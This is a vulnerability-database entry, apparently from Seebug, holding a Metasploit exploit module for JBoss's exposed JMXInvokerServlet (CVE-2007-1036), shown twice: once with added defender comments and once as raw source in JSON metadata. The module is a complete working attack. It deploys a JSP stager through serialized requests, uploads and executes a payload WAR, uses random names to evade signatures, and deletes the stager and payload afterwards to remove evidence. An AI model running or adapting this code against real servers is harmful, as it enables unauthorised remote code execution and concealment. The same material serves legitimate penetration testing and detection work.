ID SSV:74923
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
# Ranking constant the author assigns to this module (defined by the framework).
Rank = ExcellentRanking
# Pattern list for the target's HTTP fingerprint; presumably the framework's
# HTTP client mixin uses it to confirm the server identifies as JBoss before
# the module proceeds (TODO confirm against the HttpClient mixin).
HttpFingerprint = { :pattern => [ /JBoss/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
# Registers the module metadata (name, description, references, targets) and
# the user-settable options with the framework through update_info and
# register_options.
#
# Defender note: per the description below, the module depends on the JMX
# invoker servlet being exposed over HTTP on JBoss 4.x / 5.x. The default
# TARGETURI registered here (/invoker/JMXInvokerServlet, port 8080) is the
# endpoint to restrict, authenticate or monitor on such hosts.
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have an
exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
to finally upload the selected payload to the target. The DeploymentFileRepository
methods are only available on Jboss 4.x and 5.x.
},
'Author' => [
'Patrick Hof', # Vulnerability discovery, analysis and PoC
'Jens Liebchen', # Vulnerability discovery, analysis and PoC
'h0ng10' # Metasploit module
],
'License' => MSF_LICENSE,
# Public identifiers for the underlying issue, useful for matching this
# module against scanner findings and vendor advisories.
'References' =>
[
[ 'CVE', '2007-1036' ],
[ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
],
'DisclosureDate' => 'Feb 20 2007',
'Privileged' => true,
'Platform' => ['java', 'win', 'linux' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
# Default entry. The exploit method matches the name "Automatic" and then
# calls auto_target; the Arch/Platform declared here are the Java ones.
[ 'Automatic',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
# Note: this entry declares no 'Platform' key, unlike the other targets.
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
},
],
#
# Platform specific targets
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
# Index into 'Targets' above: 0 is the 'Automatic' entry.
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
# JSP and APPBASE are optional; the exploit method falls back to random
# names when they are unset, so the resulting URIs are not predictable.
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),
], self.class)
end
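# Probes the invoker servlet with the pre-serialized 'version.bin' request and
# maps the response to a check code. Nothing is deployed by this method.
#
# Defender note: a Safe result only means that a 200 response carried neither
# a 4.x / 5.x version tag nor the text "ServletException"; it says nothing
# about whether the invoker servlet itself is access-controlled.
#
# @return [Exploit::CheckCode] Unknown when no usable response came back,
#   Vulnerable for a JBoss 4.x / 5.x version tag, Appears when the body
#   mentions a ServletException, Safe otherwise.
def check
  res = send_serialized_request('version.bin')

  # send_serialized_request returns nil for a missing or non-200 response, so
  # res can be nil here; it must not be dereferenced when building the message.
  if res.nil? || res.code != 200
    code = res ? res.code.to_s : 'none'
    print_error("Unable to request version, returned http code is: #{code}")
    return Exploit::CheckCode::Unknown
  end

  body = res.body

  # Check if the version is supported by this exploit
  return Exploit::CheckCode::Vulnerable if body =~ /CVSTag=Branch_4_/
  return Exploit::CheckCode::Vulnerable if body =~ /SVNTag=JBoss_4_/
  return Exploit::CheckCode::Vulnerable if body =~ /SVNTag=JBoss_5_/

  # Simple check, if we caused an exception. This is a weak signal: any body
  # containing the word matches.
  if body =~ /ServletException/
    print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
    return Exploit::CheckCode::Appears
  end

  Exploit::CheckCode::Safe
end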
# Runs the whole deployment sequence against the configured target:
#   1. resolve the target (auto_target when 'Automatic' is selected),
#   2. install a JSP stager through the pre-serialized 'installstager.bin' request,
#   3. POST the base64-encoded payload WAR to the stager,
#   4. request the payload JSP,
#   5. ask the stager to delete the WAR, then remove the stager file and directory.
#
# Defender note (artifacts visible in this method): POSTs to the invoker
# servlet path, followed by GET/POST requests to two previously unseen
# /<random-letters>/<random-letters>.jsp URIs, and a <name>.war written under
# the server's deploy directory by the stager (see generate_stager). Because
# the method ends with cleanup requests, on-disk evidence may be gone after a
# run; HTTP access logs and file-creation auditing of the deploy directory are
# the more durable sources. The cleanup results are not checked, so leftovers
# are also possible.
def exploit
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
# NOTE(review): fail_with is called with a single argument here; confirm
# this matches the signature of the framework version in use.
fail_with("Unable to automatically select a target") if not mytarget
print_status("Automatically selected target: \"#{mytarget.name}\"")
else
print_status("Using manually select target: \"#{mytarget.name}\"")
end
# We use a already serialized stager to deploy the final payload
regex_stager_app_base = rand_text_alpha(14)
regex_stager_jsp_name = rand_text_alpha(14)
name_parameter = rand_text_alpha(8)
content_parameter = rand_text_alpha(8)
stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"
stager_code = "A" * 810 # 810 is the size of the stager in the serialized request
# Placeholder => replacement pairs applied to the serialized template by
# send_serialized_request. Each replacement is requested with the same length
# as its placeholder (14, 14 and 810 characters), presumably so that length
# fields inside the serialized stream stay valid (TODO confirm).
replace_values = {
'regex_app_base' => regex_stager_app_base,
'regex_jsp_name' => regex_stager_jsp_name,
stager_code => generate_stager(name_parameter, content_parameter)
}
print_status("Deploying stager")
# The return value is ignored: a failed install is only reported by the
# error message printed inside send_serialized_request.
send_serialized_request('installstager.bin', replace_values)
print_status("Calling stager: #{stager_uri}")
call_uri_mtimes(stager_uri, 5, 'GET')
# Generate the WAR with the payload which will be uploaded through the stager
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
war_data = payload.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
:arch => mytarget.arch,
:platform => mytarget.platform
}).to_s
b64_war = Rex::Text.encode_base64(war_data)
print_status("Uploading payload through stager")
# res is assigned here and below but never inspected in this method.
# The second argument (20) is presumably a timeout in seconds (TODO confirm).
res = send_request_cgi({
'uri' => stager_uri,
'method' => "POST",
'vars_post' =>
{
name_parameter => app_base,
content_parameter => b64_war
}
}, 20)
payload_uri = "/#{app_base}/#{jsp_name}.jsp"
print_status("Calling payload: " + payload_uri)
res = call_uri_mtimes(payload_uri,5, 'GET')
# Remove the payload through stager
# (a request carrying only the name parameter takes the stager's delete branch)
print_status("Removing payload through stager")
delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
res = send_request_cgi(
{'uri' => delete_payload_uri,
})
# Remove the stager
print_status("Removing stager")
send_serialized_request('removestagerfile.bin', replace_values)
send_serialized_request('removestagerdirectory.bin', replace_values)
handler
end
# Builds the JSP stager source that the exploit method substitutes into the
# serialized install request.
#
# The generated JSP has two branches, selected by whether the request carries
# the content parameter:
#   * present: base64-decodes it and writes the bytes to
#              <jboss.server.home.dir>/deploy/<name>.war
#   * absent:  deletes <jboss.server.home.dir>/deploy/<name>.war
# Both branches swallow every exception (empty catch blocks).
#
# Defender note: the Java identifiers and both parameter names are random, so
# they are not usable as signatures. The fixed literals in the script are
# sun.misc.BASE64Decoder, jboss.server.home.dir, "/deploy/" and ".war", and
# the script is always padded to 810 characters.
#
# @param name_param [String] request parameter name carrying the WAR base name
# @param content_param [String] request parameter name carrying the base64 WAR
# @return [String] the JSP source, right-padded with spaces to 810 characters
def generate_stager(name_param, content_param)
# Random names for the Java local variables (length argument is 4..7).
war_file = rand_text_alpha(4+rand(4))
file_content = rand_text_alpha(4+rand(4))
jboss_home = rand_text_alpha(4+rand(4))
decoded_content = rand_text_alpha(4+rand(4))
path = rand_text_alpha(4+rand(4))
fos = rand_text_alpha(4+rand(4))
name = rand_text_alpha(4+rand(4))
file = rand_text_alpha(4+rand(4))
stager_script = <<-EOT
<%@page import="java.io.*,
java.util.*,
sun.misc.BASE64Decoder"
%>
<%
String #{file_content} = "";
String #{war_file} = "";
String #{jboss_home} = System.getProperty("jboss.server.home.dir");
if (request.getParameter("#{content_param}") != null){
try {
#{file_content} = request.getParameter("#{content_param}");
#{war_file} = request.getParameter("#{name_param}");
byte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});
String #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";
FileOutputStream #{fos} = new FileOutputStream(#{path});
#{fos}.write(#{decoded_content});
#{fos}.close();
}
catch(Exception e) {}
}
else {
try{
String #{name} = request.getParameter("#{name_param}");
String #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";
new File(#{file}).delete();
}
catch(Exception e) {}
}
%>
EOT
# The script must be exactly 810 characters long, otherwise we might have serialization issues
# Therefore we fill the rest with spaces
# (String#* raises ArgumentError if the script is already longer than 810.)
spaces = " " * (810 - stager_script.length)
stager_script << spaces
end
# Loads a pre-serialized request template shipped with the framework, applies
# literal substitutions to it and POSTs the result to the invoker servlet path.
#
# @param file_name [String] template file name under
#   <install_root>/data/exploits/jboss_jmxinvoker/DeploymentFileRepository/
# @param replace_params [Hash] placeholder => replacement; each pair is applied
#   with gsub! on the raw template bytes
# @return the response object when the status is 200, otherwise nil (an error
#   line is printed first). Callers must handle the nil case.
def send_serialized_request(file_name , replace_params = {})
path = File.join( Msf::Config.install_root, "data", "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
# Binary read of the whole file; the assignment inside the block is redundant,
# the block's value is what ends up in data.
data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
# The callers in this file pass String keys, which gsub! matches literally.
replace_params.each { |key, value| data.gsub!(key, value) }
# NOTE(review): the header key below is the literal string 'ContentType:'
# rather than 'Content-Type'; how the HTTP client emits it is not visible
# here. Detection rules keyed only on a Content-Type of
# application/x-java-serialized-object should not be assumed to match this
# module's requests without checking.
# The trailing 25 is presumably a timeout in seconds (TODO confirm).
res = send_request_cgi({
'uri' => target_uri.path,
'method' => 'POST',
'data' => data,
'headers' =>
{
'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',
'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'
}
}, 25)
# No response and any non-200 status are reported identically.
if (not res) or (res.code != 200)
print_error("Failed: Error requesting preserialized request #{file_name}")
return nil
end
res
end
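# Requests +uri+ up to +num_attempts+ times, pausing 5 seconds between tries,
# because JBoss might need some time before a deployment answers.
#
# @param uri [String] path to request
# @param num_attempts [Integer] maximum number of requests
# @param verb [String, nil] HTTP method; "POST" sends +data+ as the request
#   body, any other value appends +data+ as a query string
# @param data [String, nil] body or query string, may be nil
# @return the response of the first attempt answered with 200, otherwise the
#   last response (nil when there was none) once the final attempt has failed
def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)
  is_post = (verb == "POST")

  # Build the request URI once. Appending the query string inside the retry
  # loop made it grow by one "?data" on every retry.
  request_uri = (is_post || data.nil?) ? uri : "#{uri}?#{data}"

  num_attempts.times do |attempt|
    res =
      if is_post
        send_request_cgi({ 'uri' => request_uri, 'method' => verb, 'data' => data }, 5)
      else
        send_request_cgi({ 'uri' => request_uri, 'method' => verb }, 30)
      end

    if res && res.code == 200
      print_status("Successfully called '#{request_uri}'") if datastore['VERBOSE']
      return res
    end

    # Everything else is a failure. This includes 2xx codes other than 200,
    # which previously left the message nil and raised NoMethodError below.
    msg =
      if res
        "http request failed to #{request_uri} [#{res.code}]"
      else
        "Execution failed on #{request_uri} [No Response]"
      end

    if attempt < num_attempts - 1
      msg << ", retrying in 5 seconds..."
      print_status(msg) if datastore['VERBOSE']
      # select with a timeout and no descriptors is used as a 5 second sleep
      select(nil, nil, nil, 5)
    else
      print_error(msg)
      return res
    end
  end
end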
# Picks the entry of the module's target list whose 'Platform' and 'Arch'
# both equal the values reported by detect_platform and detect_architecture.
#
# Both detection calls are always made, in that order, before the result is
# evaluated.
#
# @return the first matching target, or nil when either detection failed or
#   no target matches
def auto_target
  print_status("Attempting to automatically select a target")

  detected_platform = detect_platform()
  detected_arch = detect_architecture()

  return nil unless detected_arch && detected_platform

  # first entry that agrees on both fields, nil if there is none
  targets.find do |candidate|
    candidate['Platform'] == detected_platform && candidate['Arch'] == detected_arch
  end
end
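# Try to autodetect the target platform.
#
# Sends the pre-serialized 'osname.bin' request and maps the first OS name
# found in the response body to a platform string.
#
# @return [String, nil] 'linux' (also returned for FreeBSD), 'win', or nil
#   when there is no usable response or no known OS name in the body
def detect_platform
  print_status("Attempting to automatically detect the platform")
  res = send_serialized_request("osname.bin")

  # send_serialized_request returns nil on failure; without this guard the
  # body access raised NoMethodError instead of reporting "no platform".
  return nil unless res
  return nil unless res.body =~ /(Linux|FreeBSD|Windows)/i

  case Regexp.last_match(1).downcase
  when 'linux', 'freebsd' then 'linux'
  when 'windows' then 'win'
  end
end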
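# Try to autodetect the architecture.
#
# Sends the pre-serialized 'osarch.bin' request and looks for an x86 marker in
# the response body. The pattern is unanchored, so a body such as "x86_64"
# also matches; nothing else (for example "amd64") is recognised.
#
# @return ARCH_X86 when the body contains "i386" or "x86" (case-insensitive),
#   nil when there is no usable response or no match
def detect_architecture()
  print_status("Attempting to automatically detect the architecture")
  res = send_serialized_request("osarch.bin")

  # send_serialized_request returns nil on failure; without this guard the
  # body access raised NoMethodError instead of reporting "no architecture".
  return nil unless res

  # TODO, more
  return ARCH_X86 if res.body =~ /i386|x86/i

  nil
end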
end
{"lastseen": "2017-11-19T16:09:24", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "dsquare", "idList": ["E-62"]}]}, "exploitation": null, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-74923", "references": [], "enchantments_done": [], "id": "SSV:74923", "title": "JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n require 'msf/core'\r\n\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /JBoss/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have an\r\n\t\t\t\texposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking\r\n\t\t\t\tthe methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\r\n\t\t\t\tto finally upload the selected payload to the target. 
The DeploymentFileRepository\r\n\t\t\t\tmethods are only available on Jboss 4.x and 5.x.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t'Patrick Hof', # Vulnerability discovery, analysis and PoC\r\n\t\t\t\t'Jens Liebchen', # Vulnerability discovery, analysis and PoC\r\n\t\t\t\t'h0ng10' # Metasploit module\r\n\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-1036' ],\r\n\t\t\t\t\t[ 'OSVDB', '33744' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 20 2007',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['java', 'win', 'linux' ],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Aggressive,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t# do target detection but java meter by default\r\n\t\t\t\t\t[ 'Automatic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Platform' => 'java'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Java Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Platform specific targets\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t\t\tOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\r\n\t\t\t\t\tOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\r\n\t\t\t\t\tOptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),\r\n\t\t\t\t], 
self.class)\r\n\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_serialized_request('version.bin')\r\n\t\tif (res.nil?) or (res.code != 200)\r\n\t\t\tprint_error("Unable to request version, returned http code is: #{res.code.to_s}")\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\t# Check if the version is supported by this exploit\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/\r\n\r\n\t\tif res.body =~ /ServletException/\t# Simple check, if we caused an exception.\r\n\t\t\tprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tmytarget = target\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tmytarget = auto_target\r\n\t\t\tfail_with("Unable to automatically select a target") if not mytarget\r\n\t\t\tprint_status("Automatically selected target: \\"#{mytarget.name}\\"")\r\n\t\telse\r\n\t\t\tprint_status("Using manually select target: \\"#{mytarget.name}\\"")\r\n\t\tend\r\n\r\n\r\n\t\t# We use a already serialized stager to deploy the final payload\r\n\t\tregex_stager_app_base = rand_text_alpha(14)\r\n\t\tregex_stager_jsp_name = rand_text_alpha(14)\r\n\t\tname_parameter = rand_text_alpha(8)\r\n\t\tcontent_parameter = rand_text_alpha(8)\r\n\t\tstager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"\r\n\t\tstager_code = "A" * 810\t\t# 810 is the size of the stager in the serialized request\r\n\r\n\t\treplace_values = {\r\n\t\t\t'regex_app_base' => regex_stager_app_base,\r\n\t\t\t'regex_jsp_name' => regex_stager_jsp_name,\r\n\t\t\tstager_code => generate_stager(name_parameter, content_parameter)\r\n\t\t}\r\n\r\n\t\tprint_status("Deploying 
stager")\r\n\t\tsend_serialized_request('installstager.bin', replace_values)\r\n\t\tprint_status("Calling stager: #{stager_uri}")\r\n\t\tcall_uri_mtimes(stager_uri, 5, 'GET')\r\n\r\n\t\t# Generate the WAR with the payload which will be uploaded through the stager\r\n\t\tapp_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))\r\n\t\tjsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))\r\n\r\n\t\twar_data = payload.encoded_war({\r\n\t\t\t:app_name => app_base,\r\n\t\t\t:jsp_name => jsp_name,\r\n\t\t\t:arch => mytarget.arch,\r\n\t\t\t:platform => mytarget.platform\r\n\t\t}).to_s\r\n\r\n\t\tb64_war = Rex::Text.encode_base64(war_data)\r\n\t\tprint_status("Uploading payload through stager")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => stager_uri,\r\n\t\t\t'method' => "POST",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\tname_parameter => app_base,\r\n\t\t\t\tcontent_parameter => b64_war\r\n\t\t\t}\r\n\t\t}, 20)\r\n\r\n\t\tpayload_uri = "/#{app_base}/#{jsp_name}.jsp"\r\n\t\tprint_status("Calling payload: " + payload_uri)\r\n\t\tres = call_uri_mtimes(payload_uri,5, 'GET')\r\n\r\n\t\t# Remove the payload through stager\r\n\t\tprint_status("Removing payload through stager")\r\n\t\tdelete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"\r\n\t\tres = send_request_cgi(\r\n\t\t\t{'uri' => delete_payload_uri,\r\n\t\t})\r\n\r\n\t\t# Remove the stager\r\n\t\tprint_status("Removing stager")\r\n\t\tsend_serialized_request('removestagerfile.bin', replace_values)\r\n\t\tsend_serialized_request('removestagerdirectory.bin', replace_values)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef generate_stager(name_param, content_param)\r\n\t\twar_file = rand_text_alpha(4+rand(4))\r\n\t\tfile_content = rand_text_alpha(4+rand(4))\r\n\t\tjboss_home = rand_text_alpha(4+rand(4))\r\n\t\tdecoded_content = rand_text_alpha(4+rand(4))\r\n\t\tpath = rand_text_alpha(4+rand(4))\r\n\t\tfos = rand_text_alpha(4+rand(4))\r\n\t\tname = rand_text_alpha(4+rand(4))\r\n\t\tfile = 
rand_text_alpha(4+rand(4))\r\n\r\n\t\tstager_script = <<-EOT\r\n<%@page import="java.io.*,\r\n\t\tjava.util.*,\r\n\t\tsun.misc.BASE64Decoder"\r\n%>\r\n<%\r\nString #{file_content} = "";\r\nString #{war_file} = "";\r\nString #{jboss_home} = System.getProperty("jboss.server.home.dir");\r\nif (request.getParameter("#{content_param}") != null){\r\ntry {\r\n#{file_content} = request.getParameter("#{content_param}");\r\n#{war_file} = request.getParameter("#{name_param}");\r\nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});\r\nString #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";\r\nFileOutputStream #{fos} = new FileOutputStream(#{path});\r\n#{fos}.write(#{decoded_content});\r\n#{fos}.close();\r\n}\r\ncatch(Exception e) {}\r\n}\r\nelse {\r\ntry{\r\nString #{name} = request.getParameter("#{name_param}");\r\nString #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";\r\nnew File(#{file}).delete();\r\n}\r\ncatch(Exception e) {}\r\n}\r\n\r\n%>\r\nEOT\r\n\r\n\t# The script must be exactly 810 characters long, otherwise we might have serialization issues\r\n\t# Therefore we fill the rest wit spaces\r\n\tspaces = " " * (810 - stager_script.length)\r\n\tstager_script << spaces\r\n\tend\r\n\r\n\r\n\tdef send_serialized_request(file_name , replace_params = {})\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)\r\n\t\tdata = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }\r\n\r\n\t\treplace_params.each { |key, value| data.gsub!(key, value) }\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => target_uri.path,\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'data' => data,\r\n\t\t\t'headers' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',\r\n\t\t\t\t\t'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'\r\n\t\t\t\t}\r\n\t\t}, 25)\r\n\r\n\r\n\t\tif (not 
res) or (res.code != 200)\r\n\t\t\tprint_error("Failed: Error requesting preserialized request #{file_name}")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tres\r\n\tend\r\n\r\n\r\n\tdef call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)\r\n\t\t# JBoss might need some time for the deployment. Try 5 times at most and\r\n\t\t# wait 5 seconds inbetween tries\r\n\t\tnum_attempts.times do |attempt|\r\n\t\t\tif (verb == "POST")\r\n\t\t\t\tres = send_request_cgi(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'uri' => uri,\r\n\t\t\t\t\t\t'method' => verb,\r\n\t\t\t\t\t\t'data' => data\r\n\t\t\t\t\t}, 5)\r\n\t\t\telse\r\n\t\t\t\turi += "?#{data}" unless data.nil?\r\n\t\t\t\tres = send_request_cgi(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'uri' => uri,\r\n\t\t\t\t\t\t'method' => verb\r\n\t\t\t\t\t}, 30)\r\n\t\t\tend\r\n\r\n\t\t\tmsg = nil\r\n\t\t\tif (!res)\r\n\t\t\t\tmsg = "Execution failed on #{uri} [No Response]"\r\n\t\t\telsif (res.code < 200 or res.code >= 300)\r\n\t\t\t\tmsg = "http request failed to #{uri} [#{res.code}]"\r\n\t\t\telsif (res.code == 200)\r\n\t\t\t\tprint_status("Successfully called '#{uri}'") if datastore['VERBOSE']\r\n\t\t\t\treturn res\r\n\t\t\tend\r\n\r\n\t\t\tif (attempt < num_attempts - 1)\r\n\t\t\t\tmsg << ", retrying in 5 seconds..."\r\n\t\t\t\tprint_status(msg) if datastore['VERBOSE']\r\n\t\t\t\tselect(nil, nil, nil, 5)\r\n\t\t\telse\r\n\t\t\t\tprint_error(msg)\r\n\t\t\t\treturn res\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\r\n\r\n\tdef auto_target\r\n\t\tprint_status("Attempting to automatically select a target")\r\n\r\n\t\tplat = detect_platform()\r\n\t\tarch = detect_architecture()\r\n\r\n\t\treturn nil if (not arch or not plat)\r\n\r\n\t\t# see if we have a match\r\n\t\ttargets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }\r\n\r\n\t\t# no matching target found\r\n\t\treturn nil\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the target platform\r\n\tdef detect_platform\r\n\t\tprint_status("Attempting to automatically detect the 
platform")\r\n\t\tres = send_serialized_request("osname.bin")\r\n\r\n\t\tif (res.body =~ /(Linux|FreeBSD|Windows)/i)\r\n\t\t\tos = $1\r\n\t\t\tif (os =~ /Linux/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /FreeBSD/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /Windows/i)\r\n\t\t\t\treturn 'win'\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the architecture\r\n\tdef detect_architecture()\r\n\t\tprint_status("Attempting to automatically detect the architecture")\r\n\t\tres = send_serialized_request("osarch.bin")\r\n\t\tif (res.body =~ /(i386|x86)/i)\r\n\t\t\tarch = $1\r\n\t\t\tif (arch =~ /i386|x86/i)\r\n\t\t\t\treturn ARCH_X86\r\n\t\t\t\t# TODO, more\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74923", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645253958}}
{}